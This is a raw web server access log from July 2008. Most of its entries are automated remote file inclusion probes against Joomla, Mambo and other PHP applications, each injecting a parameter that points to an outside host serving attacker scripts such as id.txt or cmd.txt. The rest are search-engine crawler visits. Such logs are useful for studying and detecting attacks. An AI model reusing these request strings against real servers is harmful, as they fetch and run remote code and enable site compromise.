81.176.68.48 - - [10/Jul/2008:00:25:05 -0500] "GET /logs/access_log.1207785600//?mosConfig_absolute_path=http://tugaspeed.info/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
81.176.68.48 - - [10/Jul/2008:00:25:05 -0500] "GET //?mosConfig_absolute_path=http://tugaspeed.info/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
81.176.68.48 - - [10/Jul/2008:00:25:07 -0500] "GET /logs//?mosConfig_absolute_path=http://tugaspeed.info/id.txt? HTTP/1.1" 200 90753 "-""libwww-perl/5.803"
74.220.215.63 - - [10/Jul/2008:00:25:09 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://paradiseinhell.altervista.org/idCrystal.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
74.220.215.63 - - [10/Jul/2008:00:25:09 -0500] "GET //Neos_Chronos/header.php?base_folder=http://paradiseinhell.altervista.org/idCrystal.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
74.220.215.63 - - [10/Jul/2008:00:25:10 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://paradiseinhell.altervista.org/idCrystal.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
81.176.68.48 - - [10/Jul/2008:00:25:13 -0500] "GET /logs/access_log.1189900800//?mosConfig_absolute_path=http://tugaspeed.info/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
203.130.242.135 - - [10/Jul/2008:00:25:41 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.apnic.net/index.html? HTTP/1.0" 404 306 "-""Mozilla/5.0"
65.55.208.122 - - [10/Jul/2008:00:27:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [10/Jul/2008:00:27:29 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
205.234.252.183 - - [10/Jul/2008:00:30:20 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
205.234.252.183 - - [10/Jul/2008:00:30:20 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
204.15.120.73 - - [10/Jul/2008:00:32:14 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 311 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
204.15.120.73 - - [10/Jul/2008:00:32:15 -0500] "GET /logs/errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 299 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
204.15.120.73 - - [10/Jul/2008:00:32:15 -0500] "GET //config/dbutil.bck.php?confdir=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 306 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
204.15.120.73 - - [10/Jul/2008:00:32:15 -0500] "GET /errors.php?error=http://81.169.162.164/typo3conf/l10n/sys_cr4nk/i? HTTP/1.1" 404 294 "-""cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]"
64.246.22.32 - - [10/Jul/2008:00:32:39 -0500] "GET /logs/home.php?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:00:32:39 -0500] "GET /home.php?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
202.39.48.108 - - [10/Jul/2008:00:37:21 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
202.39.48.108 - - [10/Jul/2008:00:37:25 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
82.194.70.164 - - [10/Jul/2008:00:37:39 -0500] "GET /logs//index.php?pagina1=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.194.70.164 - - [10/Jul/2008:00:37:39 -0500] "GET //index.php?pagina1=http://lutheranthrift.org/counter/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.194.70.164 - - [10/Jul/2008:00:37:53 -0500] "GET /logs//index.php?pagina1=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.194.70.164 - - [10/Jul/2008:00:37:54 -0500] "GET //index.php?pagina1=http://lutheranthrift.org/counter/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:00:39:20 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:00:39:20 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:00:39:44 -0500] "GET /logs//index.php?pagina1=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:00:39:45 -0500] "GET //index.php?pagina1=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.98.71 - - [10/Jul/2008:00:40:13 -0500] "GET /logs//index.php?pagina1=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.98.71 - - [10/Jul/2008:00:40:14 -0500] "GET //index.php?pagina1=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
70.85.102.132 - - [10/Jul/2008:00:42:50 -0500] "GET //index.php?pagina1=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
86.109.103.189 - - [10/Jul/2008:00:45:35 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
86.109.103.189 - - [10/Jul/2008:00:45:36 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
208.115.34.17 - - [10/Jul/2008:00:46:11 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
208.115.34.17 - - [10/Jul/2008:00:46:11 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
195.95.229.220 - - [10/Jul/2008:00:51:02 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
195.95.229.220 - - [10/Jul/2008:00:51:02 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
74.6.8.88 - - [10/Jul/2008:00:51:56 -0500] "GET /logs/access_log.1170028800 HTTP/1.0" 200 144070 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.88 - - [10/Jul/2008:00:53:41 -0500] "GET /logs/access_log.1176422400 HTTP/1.0" 200 270068 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.246.22.32 - - [10/Jul/2008:00:53:50 -0500] "GET /logs/db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:00:53:50 -0500] "GET /db.php?path_local=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
195.95.229.220 - - [10/Jul/2008:00:55:33 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
195.95.229.220 - - [10/Jul/2008:00:55:33 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
209.62.24.242 - - [10/Jul/2008:00:56:41 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
209.62.24.242 - - [10/Jul/2008:00:56:41 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
209.62.24.242 - - [10/Jul/2008:00:56:41 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.62.24.242 - - [10/Jul/2008:00:56:51 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
67.195.37.168 - - [10/Jul/2008:01:00:16 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.58.181.13 - - [10/Jul/2008:01:01:04 -0500] "GET /logs//index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.58.181.13 - - [10/Jul/2008:01:01:04 -0500] "GET /logs//index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.58.181.13 - - [10/Jul/2008:01:01:04 -0500] "GET //index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
207.58.181.13 - - [10/Jul/2008:01:01:04 -0500] "GET //index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
204.15.135.98 - - [10/Jul/2008:01:01:09 -0500] "GET /logs//index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
204.15.135.98 - - [10/Jul/2008:01:01:09 -0500] "GET /logs//index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
204.15.135.98 - - [10/Jul/2008:01:01:09 -0500] "GET //index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
204.15.135.98 - - [10/Jul/2008:01:01:09 -0500] "GET //index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.160.76.187 - - [10/Jul/2008:01:01:38 -0500] "GET /logs//index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
217.160.76.187 - - [10/Jul/2008:01:01:38 -0500] "GET /logs//index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
217.160.76.187 - - [10/Jul/2008:01:01:38 -0500] "GET //index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
217.160.76.187 - - [10/Jul/2008:01:01:38 -0500] "GET //index.php?pagina1=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
195.95.229.220 - - [10/Jul/2008:01:01:52 -0500] "GET /logs//include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.95.229.220 - - [10/Jul/2008:01:01:52 -0500] "GET //include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
85.236.38.117 - - [10/Jul/2008:01:03:13 -0500] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.236.38.117 - - [10/Jul/2008:01:03:15 -0500] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:01:07:52 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:01:07:53 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
217.160.76.187 - - [10/Jul/2008:01:08:18 -0500] "GET /logs//index.php?pagina1=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
217.160.76.187 - - [10/Jul/2008:01:08:18 -0500] "GET //index.php?pagina1=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
91.198.175.18 - - [10/Jul/2008:01:14:59 -0500] "GET /logs/access_log.1207785600/component/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.808"
66.7.193.54 - - [10/Jul/2008:01:19:37 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
66.7.193.54 - - [10/Jul/2008:01:19:37 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
202.181.105.117 - - [10/Jul/2008:01:21:45 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
202.181.105.117 - - [10/Jul/2008:01:21:45 -0500] "GET //skin/zero_vote/error.php?dir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
64.246.22.32 - - [10/Jul/2008:01:24:26 -0500] "GET /main.php5?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:01:24:26 -0500] "GET /logs/main.php5?page=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.234.133.173 - - [10/Jul/2008:01:26:29 -0500] "GET /logs//ashnews.php?pathtoashnews=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
85.234.133.173 - - [10/Jul/2008:01:26:30 -0500] "GET //ashnews.php?pathtoashnews=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
89.111.176.28 - - [10/Jul/2008:01:30:30 -0500] "GET /logs//modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.111.176.28 - - [10/Jul/2008:01:30:30 -0500] "GET //modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
65.214.45.147 - - [10/Jul/2008:01:37:38 -0500] "GET /logs/access_log.1177804800 HTTP/1.0" 200 156963 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
216.75.35.118 - - [10/Jul/2008:01:41:29 -0500] "GET /logs/access_log.1207785600//include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
216.75.35.118 - - [10/Jul/2008:01:41:29 -0500] "GET //include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
216.75.35.118 - - [10/Jul/2008:01:41:30 -0500] "GET /logs//include.php?path[docroot]=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
64.83.0.42 - - [10/Jul/2008:01:42:21 -0500] "GET /logs//?path%5Bdocroot%5D=http://queb3.info/cruise/tanii?????? HTTP/1.1" 200 90753 "-""libwww-perl/5.805"
64.83.0.42 - - [10/Jul/2008:01:42:22 -0500] "GET //?path%5Bdocroot%5D=http://queb3.info/cruise/tanii?????? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
208.98.1.12 - - [10/Jul/2008:01:44:32 -0500] "GET /logs/access_log.1183507200//ws/get_events.php?includedir=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
208.98.1.12 - - [10/Jul/2008:01:44:32 -0500] "GET //ws/get_events.php?includedir=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
208.98.1.12 - - [10/Jul/2008:01:44:32 -0500] "GET /logs//ws/get_events.php?includedir=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
64.246.22.32 - - [10/Jul/2008:01:45:58 -0500] "GET /logs/start.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.246.22.32 - - [10/Jul/2008:01:45:58 -0500] "GET /start.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
86.109.103.189 - - [10/Jul/2008:01:46:37 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
86.109.103.189 - - [10/Jul/2008:01:46:37 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
195.34.175.196 - - [10/Jul/2008:01:49:36 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://tukons.com/backup/raid.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
195.34.175.196 - - [10/Jul/2008:01:49:37 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://tukons.com/backup/raid.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
74.6.17.93 - - [10/Jul/2008:01:50:19 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [10/Jul/2008:01:50:19 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.234.133.173 - - [10/Jul/2008:01:50:48 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
85.234.133.173 - - [10/Jul/2008:01:50:48 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.811"
71.41.200.74 - - [10/Jul/2008:01:54:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""MLBot (www.metadatalabs.com/mlbot)"
71.41.200.74 - - [10/Jul/2008:01:54:00 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""MLBot (www.metadatalabs.com/mlbot)"
207.44.154.31 - - [10/Jul/2008:01:54:23 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif??? HTTP/1.1" 200 90753 "-""libwww-perl/5.79"
207.44.154.31 - - [10/Jul/2008:01:54:23 -0500] "GET //?path%5Bdocroot%5D=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
85.234.133.173 - - [10/Jul/2008:01:55:45 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
85.234.133.173 - - [10/Jul/2008:01:55:45 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
213.203.223.115 - - [10/Jul/2008:01:58:20 -0500] "GET /main.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.203.223.115 - - [10/Jul/2008:01:58:20 -0500] "GET /logs/main.php3?act=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.141.56.36 - - [10/Jul/2008:01:58:56 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
62.141.56.36 - - [10/Jul/2008:01:58:57 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
208.115.34.17 - - [10/Jul/2008:02:00:16 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
208.115.34.17 - - [10/Jul/2008:02:00:17 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.addhelium.com/community//plugins/safehtml/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
66.7.193.54 - - [10/Jul/2008:02:00:33 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
66.7.193.54 - - [10/Jul/2008:02:00:33 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.themontyclub.co.uk/joomla/mambots/editors-xtd/xml/temp.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
195.95.229.220 - - [10/Jul/2008:02:04:11 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.95.229.220 - - [10/Jul/2008:02:04:12 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
216.246.29.107 - - [10/Jul/2008:02:08:00 -0500] "GET /addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://lasekmu.co.cc/lase/test.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
216.246.29.107 - - [10/Jul/2008:02:08:00 -0500] "GET /logs/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://lasekmu.co.cc/lase/test.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
83.19.39.162 - - [10/Jul/2008:02:08:20 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.19.39.162 - - [10/Jul/2008:02:08:21 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.87.96.4 - - [10/Jul/2008:02:08:48 -0500] "GET //?path%5Bdocroot%5D=http://queb3.info/cruise/test.txt??? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
203.87.96.4 - - [10/Jul/2008:02:08:49 -0500] "GET /logs//?path%5Bdocroot%5D=http://queb3.info/cruise/test.txt??? HTTP/1.1" 200 90753 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
89.122.29.122 - - [10/Jul/2008:02:13:25 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.ringsworld.com/history/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
74.6.8.88 - - [10/Jul/2008:02:14:31 -0500] "GET /logs/access_log.1180137600 HTTP/1.0" 200 153277 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.19.39.162 - - [10/Jul/2008:02:14:52 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.19.39.162 - - [10/Jul/2008:02:14:52 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.234.133.173 - - [10/Jul/2008:02:16:23 -0500] "GET /logs//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 351 "-""libwww-perl/5.811"
85.234.133.173 - - [10/Jul/2008:02:16:23 -0500] "GET //components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank?? HTTP/1.1" 404 346 "-""libwww-perl/5.811"
83.19.39.162 - - [10/Jul/2008:02:18:43 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.19.39.162 - - [10/Jul/2008:02:18:43 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.19.39.162 - - [10/Jul/2008:02:19:36 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.19.39.162 - - [10/Jul/2008:02:19:36 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
